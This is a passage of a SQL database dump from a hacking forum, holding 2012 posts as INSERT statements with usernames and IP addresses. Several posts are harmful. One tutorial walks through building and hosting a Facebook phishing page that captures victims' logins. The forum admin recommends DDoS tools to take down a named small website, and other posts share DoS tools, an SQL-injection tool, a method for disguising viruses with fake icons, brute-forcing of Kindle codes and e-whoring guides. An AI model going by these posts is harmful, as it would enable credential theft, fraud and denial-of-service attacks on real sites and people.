INTO mybb_posts VALUES('253', '31', '86', '7', 'RE: How long are you online daily?', '0', '8', 'spacefish36', '1344964543', 'About 2-4 hours maximum. I don\'t want to destroy my eyes :P', '41.174.19.86', '699274070', '0', '0', '0', '0', '1', '523241e34cc1cddd9a33332d3eb7acaf', '0', '0'); INSERT INTO mybb_posts VALUES('254', '52', '134', '9', '?? Adsense Secrets - What Google Never Told ?? [New Release] [Huge Profits]', '0', '8', 'spacefish36', '1344964677', 'Thanks for the download. This thing is awesome.', '41.174.19.86', '699274070', '0', '0', '0', '0', '1', '75a35e3369530fa2635a56b02dcf3ae5', '0', '0'); INSERT INTO mybb_posts VALUES('255', '60', '146', '25', 'RE: [guide] Basic Computer Security', '0', '8', 'spacefish36', '1344964779', 'Wow thanks for this guide on computer security. It\'s extremely useful.', '41.174.19.86', '699274070', '0', '0', '0', '0', '1', '126259be011119de185ee04e5101ddcd', '0', '0'); INSERT INTO mybb_posts VALUES('256', '105', '0', '11', 'DDos', '3', '48', 'BurnsH4X', '1344965203', 'Hello pple on the internet i was just curious to know how to ddos a small website \r\nand more important how to not get ddosed', '78.133.53.116', '1317352820', '1', '0', '0', '0', '1', 'a970c504afbe9cf65e4797236d0c7020', '0', '0'); INSERT INTO mybb_posts VALUES('257', '106', '0', '38', 'Filling a scam report', '0', '1', 't3h jok3r', '1344965610', 'The reason why it\'s important for you to fill a scam report here is because then it would be useful for others to be extra caution and so that we can also ban the scammer and also provide the needful information to any company you would like. \r\n\r\n[b]Things to do when scammed[/b]\r\n\r\n[list]\r\n[*] Neg rep or neutral rep the scammer with a link to the dispute\r\n[*] Create a scam report with all the information you have\r\n[*] Provide the UID of the scammer in the title of the thread\r\n[/list]\r\n\r\n[b]Scam Report Template[/b]\r\n\r\n[code]\r\n[b]User Scammed:[/b]\r\n[b]Link to Scammer:[/b]\r\n[b]Screenshots/videos of conversation:[/b]\r\n[b]Proof of deal/purchase:[/b]\r\n[b]What was the deal about?[/b]\r\n[b]Other:[/b]\r\n[i]**Optional :-[/i] [b]Link to sales thread:[/b]\r\n[/code]\r\n\r\n[color=#FF0000]When providing a Proof of Purchase, please censor the transaction ID and the @DOMAIN.com if the email is visible.[/color]\r\n\r\nGood Luck and sorry to hear about the scam.', '41.174.19.86', '699274070', '1', '0', '0', '0', '1', '99e4c2a2bb9f334a63ae028d73797d03', '0', '0'); INSERT INTO mybb_posts VALUES('258', '105', '256', '11', 'RE: DDos', '0', '1', 't3h jok3r', '1344965783', 'To DoS a website, you would need a DDoSer or a Booter. \n\nYou can download DDoSers from http://l33thacking.com/forumdisplay.php?fid=21\n\nWhat do you mean by not get DDoSed? I mean prevent getting DDoSed, Knocked off from XBL, Website DDoS protection.', '41.174.19.86', '699274070', '1', '0', '0', '0', '1', '39c69e5c93d79cd5b0e6aa1029499dd4', '0', '0'); INSERT INTO mybb_posts VALUES('259', '95', '225', '13', 'RE: XSS Cheat Sheet', '0', '1', 't3h jok3r', '1344965986', 'Brilliant thread right there OP.\n\nThanks for contributing.', '41.174.19.86', '699274070', '1', '0', '0', '0', '1', '56e3a3fd5c7b1ed0c400b48a6a7c7350', '0', '0'); INSERT INTO mybb_posts VALUES('260', '6', '124', '4', 'RE: Welcome to L33THacking.com', '0', '1', 't3h jok3r', '1344966038', '[quote=\'Timmy\' pid=\'124\' dateline=\'1342266771\']\r\nThanks for clarifying the admin tasks. I guess it makes it easier to understand what to report to who.\r\n[/quote]\r\n\r\nTrue, it does make it a lot easier.', '41.174.19.86', '699274070', '1', '0', '0', '0', '1', '54572eb188c019573545822e41d0be08', '0', '0'); INSERT INTO mybb_posts VALUES('261', '107', '0', '12', 'how to change the icon of an exe file using resource hacker', '0', '50', 'sana khan', '1344967490', 'hello guys today m gona show u, how to change the icon of an exe file. u will able to change the icon of any exe file or virus with other icons like pictures, jpg , png etc, depend on ur choice.\r\nwell, this is my first tutorial. i hope u guys will enjoy it.\r\n\r\nlets get started...\r\n\r\n[size=medium][b]first u will need following things.[/b]\r\n1) resource hacker software. i recommended resource hacker 3.4\r\nu can use the down link.[/size]\r\n\r\n[url=http://download.cnet.com/Resource-Hacker/3001-2352_4-10178587.html?spi=4376cba5128219dff5f810717ecde0d3]download link[/url]\r\n\r\n\r\n[size=medium]2)any icon file (.ico)[/size]\r\n\r\n[url=http://findicons.com/search/picture#]click here for icon[/url]\r\n\r\n[size=medium]3) an exe file[/size]\r\n\r\n[size=large][b]steps:[/b][/size]\r\n\r\n1. first install resource hacker. then open it. u will get such a window\r\n\r\n[img]https://lh5.googleusercontent.com/-ajt7VUYoGFc/UCqNUnKYYdI/AAAAAAAAABQ/X3F0zmf7Hp4/s819/Untitled.jpg[/img]\r\n\r\n2. click file. then click open.\r\n3. select the exe file, u wanted to change icon of that file.\r\n\r\n[img]https://lh3.googleusercontent.com/-vqG8DmuM8vk/UCqNTzWRC4I/AAAAAAAAABM/sqUXF9qsax0/s819/2.jpg[/img]\r\n\r\n4.after adding image. select icon group. extend the first folder of icon group.\r\nright click on file nd select replace resource option.\r\n\r\n[img]https://lh6.googleusercontent.com/-lfHKCpnDxq0/UCqNI3ds8oI/AAAAAAAAABE/_HApyNi2l40/s819/4.jpg[/img]\r\n\r\n5.an other window will open. select any icon of ur choice.\r\n\r\n[img]https://lh4.googleusercontent.com/-GrdrjZZrP0I/UCqNF0PeMPI/AAAAAAAAAA4/_j7KNRw55pI/s819/5.jpg[/img]\r\n\r\n6.then click file and save ur new file.\r\n\r\n[img]https://lh3.googleusercontent.com/-vEp3Pybu_BQ/UCqNDQPruHI/AAAAAAAAAAk/5k_QhxlBEZk/s683/7.jpg[/img]\r\n\r\nnow the exe file will have icon of ur choice.', '182.177.26.34', '-1229907422', '0', '1', '0', '0', '1', 'de7d0f4e342922482438a2bfeda9acbe', '0', '0'); INSERT INTO mybb_posts VALUES('262', '108', '0', '4', 'Hey all', '0', '53', 'sirchamp', '1344977474', 'Hey guys\r\nIm new to this forum^^ Ive been active on several hacking forums.\r\nI started to learn to hack about 3years ago and im willing to share my knowledge on this ,rather small (at the moment),forum.\r\nSorry if my english isnt perfect. Im not a native speaker as you perhaps have noticed.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '2922e856113dc5f2ab0969863742136b', '0', '0'); INSERT INTO mybb_posts VALUES('263', '105', '256', '11', 'RE: DDos', '0', '53', 'sirchamp', '1344978603', 'You could even Dos a site with cmd. Ask me if you wanna know how.\r\nBut as you were reffering to Ddos you would need a botnet or a booter.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '4a8a64b720252be0b2b1f82c69fe6578', '0', '0'); INSERT INTO mybb_posts VALUES('264', '105', '256', '11', 'RE: DDos', '0', '48', 'BurnsH4X', '1344988747', 'well i have used the cmd but it is not powerful enough it is overcome pretty easily ddos', '78.133.53.116', '1317352820', '0', '0', '0', '0', '1', '677dfb64e45933181e1783d13051f058', '0', '0'); INSERT INTO mybb_posts VALUES('265', '48', '125', '21', 'RE: [Strong] Anonymous DoSer _z0r0_in C #', '0', '48', 'BurnsH4X', '1344988840', 'link is down repost pls and thx', '78.133.53.116', '1317352820', '0', '0', '0', '0', '1', '4a03a04c5e75f1d26436e91047baa4f4', '0', '0'); INSERT INTO mybb_posts VALUES('266', '105', '256', '11', 'RE: DDos', '0', '1', 't3h jok3r', '1344989228', 'Honestly some small sites also have minor DDoS protection from Cloudflare so those sites can\'t be knocked down with CMD.', '41.151.167.170', '697804714', '1', '0', '0', '0', '1', 'ec006f56f59a234680e0a0f625f8cf42', '0', '0'); INSERT INTO mybb_posts VALUES('267', '48', '265', '21', 'RE: [Strong] Anonymous DoSer _z0r0_in C #', '0', '1', 't3h jok3r', '1344990456', '[quote=\'BurnsH4X\' pid=\'265\' dateline=\'1344988840\']\r\nlink is down repost pls and thx\r\n[/quote]\r\n\r\nThe link is working perfectly for me. It\'s down but wait for 5 seconds, then it will auto repair and redirect you to the correct page.', '41.151.167.170', '697804714', '1', '0', '0', '0', '1', 'ef9f04ca2945b3d9098905d130017561', '0', '0'); INSERT INTO mybb_posts VALUES('268', '109', '0', '4', 'Sin Cara Here', '0', '54', 'Sin Cara', '1344990993', 'Hello,\r\n\r\nI m sin cara and i m mod here. I will try my best to make this community clean from spammers. \r\n\r\nHope i will enjoy my stay here :)\r\n\r\n\r\nBest Regards\r\nSin Cara', '119.154.24.199', '2006587591', '1', '0', '0', '0', '1', '08d74c6617666ecffebf55408eb6b454', '0', '0'); INSERT INTO mybb_posts VALUES('269', '108', '262', '4', 'RE: Hey all', '0', '1', 't3h jok3r', '1344991900', 'Welcome to l33t hacking!\n\nFeel free to PM me for site related problems/help.', '41.151.167.170', '697804714', '1', '0', '0', '0', '1', 'e514a30767452c3183c91191dd72e567', '0', '0'); INSERT INTO mybb_posts VALUES('270', '109', '268', '4', 'RE: Sin Cara Here', '0', '1', 't3h jok3r', '1344991927', 'Welcome Sin Cara and hope you stay HQ :D \n\nWell welcome back actually.', '41.151.167.170', '697804714', '1', '0', '0', '0', '1', '10b3c1722a585b6734d2a4fda3c53d91', '0', '0'); INSERT INTO mybb_posts VALUES('271', '110', '0', '4', 'It\'s Baws...the Baws', '0', '55', 'Baws', '1344993153', 'Hello guys, \r\n\r\nI\'m Baws, some people might know me from HF, HappyForums.\r\n\r\nIf anyone wants help with anything, hit me up, I\'ll see what I can do.\r\n\r\nThanks,\r\nBaws', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '1e5c786a595f97f01057f554de92347e', '0', '0'); INSERT INTO mybb_posts VALUES('272', '96', '229', '30', 'RE: FBI Tools [11 in 1]', '0', '55', 'Baws', '1344993237', 'Thanks for these tools, downloading and will check them out!\n\nEdit:\n\n[b]1. All downloads must contain a virus scan.[/b]\n2. Program must not already be distributed in public forums on LH.\n3. Download at your own risk!', '98.176.49.100', '1655714148', '0', '0', '55', '1344993293', '1', '7e56cb68b955da7728bb8cd5f565114d', '0', '1344993293'); INSERT INTO mybb_posts VALUES('273', '51', '133', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '55', 'Baws', '1344993351', 'Wow thanks for the share, now it\'s going to get popular for the pedophiles.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'bc90393b73bc50605959de8f4511d762', '0', '0'); INSERT INTO mybb_posts VALUES('274', '111', '0', '29', 'MyFreeCams Model Registeration', '0', '1', 't3h jok3r', '1344993386', 'MyFreeCams is a free live webcam porn website. This ebook will show you how to register and earn loads of money through E-Whoring, you will also get access to free lifetime premium porn as well. \r\n\r\nDownload: http://www.mediafire.com/?vdcp44a7we16icg\r\n\r\nPassword: l33t\r\n\r\nEnjoy!', '41.151.167.170', '697804714', '1', '0', '0', '0', '1', '31a5c5fbe5752c7ecbeffcd8819a125f', '0', '0'); INSERT INTO mybb_posts VALUES('275', '96', '272', '30', 'RE: FBI Tools [11 in 1]', '0', '1', 't3h jok3r', '1344993503', '[quote=\'Baws\' pid=\'272\' dateline=\'1344993237\']\r\nThanks for these tools, downloading and will check them out!\r\n\r\nEdit:\r\n\r\n[b]1. All downloads must contain a virus scan.[/b]\r\n2. Program must not already be distributed in public forums on LH.\r\n3. Download at your own risk!\r\n[/quote]\r\n\r\nBut I thought I was the founder of the site and I won\'t upload viruses to harm my members. :(', '41.151.167.170', '697804714', '1', '0', '0', '0', '1', '3d8eb6d25e09f0007de727b26bc985f9', '0', '0'); INSERT INTO mybb_posts VALUES('276', '91', '219', '42', 'RE: Gold-medal swimmer admits to cheating in 100 breaststroke', '0', '55', 'Baws', '1344993687', 'They should take that medal back since he doesn\'t deserve it. :/', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '75534c0b8f5c1dd5f232f8919581510b', '0', '0'); INSERT INTO mybb_posts VALUES('277', '96', '229', '30', 'RE: FBI Tools [11 in 1]', '0', '57', 'Kasane', '1344993791', 'Not a bad share. Thanks. :D', '85.69.208.130', '1430638722', '0', '0', '0', '0', '1', 'e58ee2dfa4ee37ec03627809332077c8', '0', '0'); INSERT INTO mybb_posts VALUES('278', '110', '271', '4', 'RE: It\'s Baws...the Baws', '0', '1', 't3h jok3r', '1344993832', 'Welcome to L33T Hacking.\n\nThanks for signing up. So Mr. Baws, mind sharing what hacking skills you have?', '41.151.167.170', '697804714', '1', '0', '0', '0', '1', '69249295dc70169a2f90a28befdc67fa', '0', '0'); INSERT INTO mybb_posts VALUES('279', '111', '274', '29', 'RE: MyFreeCams Model Registeration', '0', '56', '???Emotion™', '1344994184', 'Thank you for the share. I have been wondering how you get through that registration for a while now.', '98.86.145.224', '1649840608', '0', '0', '0', '0', '1', 'c4ce7852184bf2a385e0c65049562cb3', '0', '0'); INSERT INTO mybb_posts VALUES('280', '110', '271', '4', 'RE: It\'s Baws...the Baws', '0', '56', '???Emotion™', '1344994613', 'Welcome to the site Baws.', '98.86.145.224', '1649840608', '0', '0', '0', '0', '1', '185b7edab86f75309e1db9cb2c24edbb', '0', '0'); INSERT INTO mybb_posts VALUES('281', '111', '274', '29', 'RE: MyFreeCams Model Registeration', '0', '2', 'Apathy', '1344999265', 'I thought you ha said that this I private?', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '17ccc1fd6e71366424febe1f3d3a6d4c', '0', '0'); INSERT INTO mybb_posts VALUES('282', '105', '266', '11', 'RE: DDos', '0', '48', 'BurnsH4X', '1344999678', '[quote=\'t3h jok3r\' pid=\'266\' dateline=\'1344989228\']\nHonestly some small sites also have minor DDoS protection from Cloudflare so those sites can\'t be knocked down with CMD.\n[/quote]\n\nso what program would you recomend me to bring down a website like this www.inthelittlewood.com not to hard i guess\nthe others are all slow and that italian one is italian', '78.133.53.116', '1317352820', '0', '0', '48', '1345000121', '1', 'feffb6f508a03c0ec6965a35c5d81b15', '0', '1345000121'); INSERT INTO mybb_posts VALUES('283', '112', '0', '19', '[Junk]??? Ultimate Premium PPD Ebooks Give away ???', '0', '54', 'Sin Cara', '1345011546', 'Hello,\r\n\r\nI m going to give away the premium ebook collection just for free. Some books i bought and some i got my friends.\r\n\r\n[color=#DAA520][u][b]How to get this Ebooks Pack?[/b][/u][/color]\r\n\r\nJust Post here, not PM me i will pm you link.\r\n\r\n[color=#DAA520][u][b]Note[/b][/u][/color]\r\n\r\n[color=#FF0000][b]Staff [/b][/color]/ [color=#c3c3c3][b]Upgraded[/b][/color] -----> Direct Mediafire link\r\n[b]Basic Members[/b] -------> Survey Link', '119.154.5.170', '2006582698', '1', '0', '54', '1345012657', '1', 'b61d74cc0b21b02236df00084c18c737', '0', '1345012657'); INSERT INTO mybb_posts VALUES('284', '110', '271', '4', 'RE: It\'s Baws...the Baws', '0', '54', 'Sin Cara', '1345012301', 'Welcome to LH...\nBe HQ, Stay Active and read rules.', '119.154.5.170', '2006582698', '1', '0', '0', '0', '1', '1c29d5f084ec0ed34896313ba331b950', '0', '0'); INSERT INTO mybb_posts VALUES('285', '109', '268', '4', 'RE: Sin Cara Here', '0', '54', 'Sin Cara', '1345012825', 'Thanks for saying me welcome :)', '119.154.5.170', '2006582698', '1', '0', '0', '0', '1', '143877182a72af8097aa1455b141aa5d', '0', '0'); INSERT INTO mybb_posts VALUES('286', '113', '0', '15', '?Auto Youtube viewer?', '0', '53', 'sirchamp', '1345025859', 'This is a Youtube Viewer Bot. It was NOT made by me. All Credits go to Zero0679.\n[img]http://i46.tinypic.com/xnauco.jpg[/img]\n\n\n [color=#000080]Features:\n[color=#FF0000]-Proxie list included\n-Boost youtube views\n\n[/color]Virusscan:\n[/color][color=#FFFFFF]https://www.virustotal.com/file/e65d6de10c2ba7bc8afeda513b1d80b4d85b49b60d95bb9073bf51bd5a42844e/analysis/1345025398/\n\n[/color][lock][color=#000080]Download:\n[/color]http://adf.ly/BuVGp[/lock]\n\n[color=#000080]Password:\n[/color][color=#FFFFFF]l33t\n[/color]', '188.155.56.90', '-1130678182', '1', '0', '1', '1352012216', '1', '5c15b82c63155859267e660e9dc892f8', '0', '1352012216'); INSERT INTO mybb_posts VALUES('287', '114', '0', '19', '[Junk]Havij', '0', '53', 'sirchamp', '1345027702', 'A very good tool :D\r\n[img]http://i47.tinypic.com/2aguvr6.jpg[/img]\r\n\r\n\r\n[color=#000080]Download:\r\n[/color][color=#FFFFFF]http://adf.ly/BuVuE\r\n\r\n[/color][color=#000080]Password:\r\n[/color][color=#FFFFFF]sir\r\n[/color]', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'ab103c1cbe10d4ba24d09527a9d564ad', '0', '0'); INSERT INTO mybb_posts VALUES('288', '109', '285', '4', 'RE: Sin Cara Here', '0', '1', 't3h jok3r', '1345049514', '[quote=\'Sin Cara\' pid=\'285\' dateline=\'1345012825\']\r\nThanks for saying me welcome :)\r\n[/quote]\r\n\r\n\r\nNo problem. Hope you enjoy your stay on L33T Hacking', '41.174.14.17', '699272721', '1', '0', '0', '0', '1', '42ab864eaa10741009ab44e8697841ee', '0', '0'); INSERT INTO mybb_posts VALUES('289', '105', '256', '11', 'RE: DDos', '0', '1', 't3h jok3r', '1345051192', 'You can use a DDoSer or Booter because this site is not under cloudflare protection. \n\nI would recommend using\n\nhttp://l33thacking.com/showthread.php?tid=29\nOR\nhttp://l33thacking.com/showthread.php?tid=48', '41.174.14.17', '699272721', '1', '0', '0', '0', '1', '132a334fefc531cc4daf34ef101d41f1', '0', '0'); INSERT INTO mybb_posts VALUES('290', '115', '0', '48', '[tut] How to Moderate LH as a MOD', '0', '1', 't3h jok3r', '1345052054', 'This is a quick tutorial/guide on how to Moderate LH as a MOD and what actions to take. \n\n[u][b][size=large]Forum Actions[/size][/b][/u]\n\n[u][b]Split[/u][/b]\n\nFor example...\n\nIf someone posted a question and someone else posts their own question in someone elses thread. Then you select the post then go to moderation options and select [i]split thread[/i]. You will basically create a new thread in any forum of your choice. \n\n[u][b]Junk[/b][/u]\n\nJunk:- Automatically move a thread to our trash/junk forum. Only move threads that violate LH rules and regulations.\n\nYou can junk a thread from the thread listing index.\n\n[spoiler][img]http://img98.imageshack.us/img98/8594/testqx.png[/img][/spoiler]\n\nHere is an example of the outcome \n\n[spoiler][img]http://img577.imageshack.us/img577/235/testpf.png[/img][/spoiler]\n\nSo basically the threads title will change to [junk]TITLE, the moderator who posted it will auto post(this increase their post and we know who did it) and the thread gets closed. \n\n[size=large][u][b]NOTES[/b][/u][/size]\n\nClose all answered threads in the [b]Announcements, Feedback, Bugs and Suggestions[/b].\n\nClose threads that contain infected links and edit the Original Post.', '41.174.14.17', '699272721', '1', '0', '1', '1347485546', '1', 'e6f1addb68e8d11f8fed55f0afb2eaa5', '0', '1347485546'); INSERT INTO mybb_posts VALUES('291', '91', '219', '42', 'RE: Gold-medal swimmer admits to cheating in 100 breaststroke', '0', '1', 't3h jok3r', '1345057300', 'I agree he didn\'t deserve it but he was honest as well.', '41.174.53.103', '699282791', '1', '0', '0', '0', '1', 'bfdf899bac1782c6a40d6e1eda7459a8', '0', '0'); INSERT INTO mybb_posts VALUES('292', '114', '287', '19', '[Junk]Havij', '0', '1', 't3h jok3r', '1345059665', 'This thread has been junked.', '41.174.4.140', '699270284', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('293', '99', '237', '3', 'RE: [Previews added]New theme for LH', '0', '1', 't3h jok3r', '1345061282', 'I have added some attachments. Hope you guys like it.', '41.174.54.85', '699283029', '1', '0', '0', '0', '1', 'e4627ee0db5f257e1b2af9b11623cb75', '0', '0'); INSERT INTO mybb_posts VALUES('294', '116', '0', '43', '[tut] Creating a Kindle PID', '0', '1', 't3h jok3r', '1345061796', 'o first up the PID generator is not meant to give you instant gratification it rather gives you several codes over several points spent... to compare and contrast how you are going to crack the code and you are essentially a Manuel Bruteforce with a brain which means that if that code line doesn\'t see to be yielding results you go to another and not just blundering through blindly.\r\n\r\nIn using this TUT You will be able to find your own PID\'s for amazons Kindle DX or any other kindle and for that matter most any other product that is available via the generator or any PID that you find just take 2 or 3 of them and compare the differences and mix it up.\r\n\r\nNow the way to do this is to get a PID from the generator which will look like this NOTE THIS CODE DOES NOT WORK SO DO NOT COMPLAIN THAT IT DOESN\'T. also note that I have gone through most of this but not all of it play with it and you will eventually get a good one if you get stumped use the generator as a randomizer and go again.\r\n\r\nB009 A1A0 1176 11F6\r\n\r\nthe first 3 sets of digits are the item and the last 4 are the number so what you want to do is find out which letters of the 4th section 3rd digit it will take I found that most commonly C,F,D,A,P\r\nwill work so pick one of those. \r\n\r\nThen in the 4th digit in this case the 6 change it to\r\n\r\nB009 A1A0 1176 11F7\r\n\r\nif that doesn\'t work try\r\nB009 A1A0 1176 11F8\r\nand continue until you get \r\n\r\nB009 A1A0 1176 11F0\r\n\r\nif all of those have not worked then we try this\r\n\r\nB009 A1A0 1176 11F0\r\nchange to \r\nB009 A1A0 1176 12F0\r\nchanging the second digit to 2\r\nand then continue counting down 12F0, 13F0, 14F0 and so on until you get to 19F0 since the digit of 2 doesn\'t seem to ring anything\r\nleave it at that and go back to the fourth digit\r\nB009 A1A0 1176 19F0\r\nchange to\r\nB009 A1A0 1176 19F1\r\nB009 A1A0 1176 19F2\r\nand so on and when you get tired of this set go to a different letter and repeat the process eventually you WILL get an unused code, and like I said it takes time but its still worth it in the end\r\n\r\nThat\'s all I can really tell you you are essentially manually cracking the code and ironically for me this is actually a fun \r\nprocess for me, In any case good luck and good SE\'ing.', '41.174.54.85', '699283029', '1', '0', '0', '0', '1', '0e0141f8c85ca444b9fb0cc13bd3ba47', '0', '0'); INSERT INTO mybb_posts VALUES('295', '31', '253', '7', 'RE: How long are you online daily?', '0', '1', 't3h jok3r', '1345062241', '[quote=\'spacefish36\' pid=\'253\' dateline=\'1344964543\']\r\nAbout 2-4 hours maximum. I don\'t want to destroy my eyes :P\r\n[/quote]\r\n\r\n\r\nLol, I\'m a computer nerd then because I wear glasses for far sight, I can\'t read small text from far. :whistle:', '41.174.54.85', '699283029', '1', '0', '0', '0', '1', 'aa5030df5e3d76a838861752c5482129', '0', '0'); INSERT INTO mybb_posts VALUES('296', '117', '0', '46', 'Facebook Phishin* Website [tut]with pictures', '0', '53', 'sirchamp', '1345062424', 'Hey guys Today ill show you how to make your own phishin* page\n\n\n[color=#2F4F4F]Requirements:\n[/color][color=#FFFFFF]-Php files (http://adf.ly/BvEq6 )\n-Filezilla (http://adf.ly/BvEsO )\n\n\n1. Go to Funpic.de or any other webhosting website. Im doing the tutorial with Funpic.de\n\n2. Now make an account there and go to the User centre of your account\n[img]http://i50.tinypic.com/ngvqr6.jpg[/img]\n3. In the user centre press \"Webhosting FTP\" \n\n4. Since Funpic.de is a german site i would use google translater on it. In Webhosting FTP press \"FTP Account anlegen/Make a FTP account\"\n\n5. Now just write the settings you want.\n[img]http://i45.tinypic.com/3304she.jpg[/img]\n\n6. Now start filezilla. \n[img]http://i50.tinypic.com/14119hv.jpg[/img]\nAnd login with the infos.\n\n7. Now Upload the 2 Php files. Dont mind the login.txt, youll get that too later.\n[img]http://i45.tinypic.com/k48c3r.jpg[/img]\n\n8. Now go to the website you made. Look in the Picture where to find the link [img]http://i47.tinypic.com/16nm37.jpg[/img]\n\n9. Now when someone logs into the page you get his email and the password in the ftp under the login.txt file.\n\nIf you have any questions feel free to ask me.\nI hope you liked it [/color]', '188.155.56.90', '-1130678182', '1', '0', '53', '1345105962', '1', '3fc1c8d1912ef76cd5b11f3bc092067d', '0', '1345105962'); INSERT INTO mybb_posts VALUES('297', '118', '0', '19', '[Junk]Test son', '0', '1', 't3h jok3r', '1345062793', 'Just testing if others can view this thread.', '41.174.54.85', '699283029', '1', '0', '0', '0', '1', 'e003958a1d9c9893734234687fc5b1b8', '0', '0'); INSERT INTO mybb_posts VALUES('298', '99', '237', '3', 'RE: [Previews added]New theme for LH', '0', '4', 'Triple H', '1345062874', 'The theme looks awesome. Never thought green and grey would get along.', '41.174.54.85', '699283029', '1', '0', '0', '0', '1', '536c2f8e8d99c9bd850b935922fa89aa', '0', '0'); INSERT INTO mybb_posts VALUES('299', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '4', 'Triple H', '1345062928', 'I would like a download link. Thanks, but is this sharecash or file ice?', '41.174.54.85', '699283029', '1', '0', '0', '0', '1', 'ba0c9137e87e14cd7262d88552d69e2d', '0', '0'); INSERT INTO mybb_posts VALUES('300', '119', '0', '49', 'Disallowed Suggestions', '0', '1', 't3h jok3r', '1345063750', 'These are the suggestions that will [b]NOT[/b] be allowed.\r\n\r\n1. Chatbox/IRC/Shoutbox :- We won\'t allow a chatbox or anything similar and we have a lot of reasons why not to add a chatbox.\r\n\r\n2. Moderator Suggestions :- We don\'t accept moderator suggestions, we don\'t care about which forum needs a moderator or who needs to be promoted because we pick staff on our discretion and people that we believe meet the requirements. We don\'t have any set requirements.\r\n\r\n3. Theme Suggestions :- The admins of LH control the design of LH, we don\'t allow any suggestions however if you find any theme error or bug then those are meant to be posted in the [b]Announcements, Feedback, Bugs and Suggestions[/b] Forum.\r\n\r\n4. Thanks or multi quote button :- We don\'t allow thanks or multi quote button for several reasons.', '41.174.54.85', '699283029', '1', '0', '0', '0', '1', '054d2c16b083666bf72ac52c03863f53', '0', '0'); INSERT INTO mybb_posts VALUES('301', '120', '0', '4', 'reloadz0r is here', '0', '62', 'R?????zo?', '1345064382', 'Hello, I\'m reloadz0r from HF. Some might know me and some not.\r\n\r\nI\'m mostly into GFX but I know some coding and I try to learn abit of everything.\r\nIf you need GFX hit me up :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '2cdd44889306bdaebe72b13e4ff274da', '0', '0'); INSERT INTO mybb_posts VALUES('302', '121', '0', '21', 'kurosaki\'s DOS Tool', '0', '1', 't3h jok3r', '1345064939', 'Releasing a DOS tool for all you guys that like taking sites and xbl players down. Pretty strong. \r\n\r\nPreview:\r\n[img]http://i.imgur.com/Q52b8.png[/img]\r\n\r\nDownload:\r\nhttp://www.mediafire.com/?h4un2hoyn5l10l1', '41.174.54.85', '699283029', '1', '0', '0', '0', '1', 'cc522ddcc884ffffdf99361c41590ea0', '0', '0'); INSERT INTO mybb_posts VALUES('303', '90', '215', '24', 'RE: [tut]How to really hide your data from the cops', '0', '1', 't3h jok3r', '1345065077', 'No problem. So how did you find the tutorial?', '41.174.54.85', '699283029', '1', '0', '0', '0', '1', 'e39f5edee7205e8d95bd4987d2b6c4f3', '0', '0'); INSERT INTO mybb_posts VALUES('304', '122', '0', '24', '[tut] Increase your virtual RAM', '0', '1', 't3h jok3r', '1345065123', '[align=center][size=medium][b][color=cyan][color=#ffd700][font=Verdana][size=xx-large]Increase Virtual RAM - To Make Your System Faster[/size][/font][/color][/color][/b][/size]\r\n[size=medium][b][color=cyan][color=#ffd700][/color][/color][/b][/size][/align][size=medium][b][color=cyan][color=#FFD700][/color]\r\n\r\n\r\n\r\nFollow the steps given below :-\r\n\r\n\r\n\r\n[color=#FFD700]1)[/color] Hold down the \'Windows\' Key and Press the \'Pause/Break\' button at the top right of your keyboard.\r\n\r\nAnother way is Right-Clicking \'My Computer\' and then Select \'Properties\'.\r\n\r\n\r\n\r\n[color=#FFD700]2)[/color] Click on the \'Advanced\' tab.\r\n\r\n\r\n\r\n[color=#FFD700]3)[/color] Under \'Performance\', click \'Settings\'.\r\n\r\n\r\n\r\n[color=#FFD700]4)[/color] Then click the \'Advanced\' tab on the button that pops up.\r\n\r\n\r\n\r\n[color=#FFD700]5)[/color] Under \'Virtual Memory\' at the bottom, click \'Change\'.\r\n\r\n\r\n\r\n[color=#FFD700]6)[/color] Click the \'Custom Size\' button.\r\n\r\n\r\n\r\n[color=#FFD700]7)[/color] For the initial size (depending \r\non your HD space), type in anywhere from 1000-1500 (although I use \r\n4000), and for the Maximum size type in anywhere from 2000-2500 \r\n(although I use 6000).\r\n\r\n\r\n\r\n[color=#FFD700]8)[/color] Click \'Set\', and then exit out of all of the windows.\r\n\r\n\r\n\r\n[color=#FFD700]9)[/color] Finally, Restart your computer.\r\n\r\n\r\n\r\n[color=#FFD700]10)[/color] You now have a faster computer and 1-2GB of Virtual RAM..![/color][/b][/size]', '41.174.54.85', '699283029', '1', '0', '0', '0', '1', '743835aeb10573023632c3b69143ba2d', '0', '0'); INSERT INTO mybb_posts VALUES('305', '123', '0', '14', 'Top 10 free VPNs', '0', '7', 'Romdu62', '1345065242', 'Top 10 best free VPNs\r\n\r\nLet\'s start.\r\n\r\n[b]1. OpenVPN[/b]\r\n\r\nOpenVPN.net is a SSL/TLS based VPN, it provides high security and privacy. The biggest difference between PPTP VPN and OpenVPN is you need install OpenVPN client software to use OpenVPN service, and OpenVPN DO NOT work on mobile devices such as iPhone, iPad, Windows Mobile and Android. But OpenVPN works on Windows, Mac and Linux.\r\n\r\n\r\n\r\n[b]2. PacketiX.NET[/b]\r\n\r\n\r\nPacketiX.NET is a Japan VPN service. It is actually a premium service, but they have PacketiX.NET online test service as well which is free to use. The service is fast and reliable and it is easy to use as well. Just download the VPN connection manager, install and connect! It works on Windows and Linux only.\r\n\r\n[b]3. UltraVPN [/b]\r\n\r\n\r\nUltraVPN is a French VPN client that hides your connection from unwanted ears and allows you to use blocked applications. It is also based on OpenVPN service. Traffic is quota is unlimited. Bandwidth is up to 500Kb/s depending on network conditions.\r\n\r\n[b]4. Hotspot Shield[/b]\r\n\r\n\r\nHotspot Shield is possibly the most popular Free VPN client in the world. It made waves when Hulu was launched as it allowed users to watch Hulu even when it was blocked. Now, they have US & UK based VPN services which you can use to protect yourself from WiFi Snoopers, identity thefts and censorships. The best part is, Hotspot Shield provides unlimited bandwidth and works on both PC & Mac.\r\n\r\n[b]5. CyberGhost[/b] \r\n\r\n\r\nCyberGhost is a free VPN service from Germany which helps you route you through a German IP. The free service is limited to 1GB traffic every month, which is 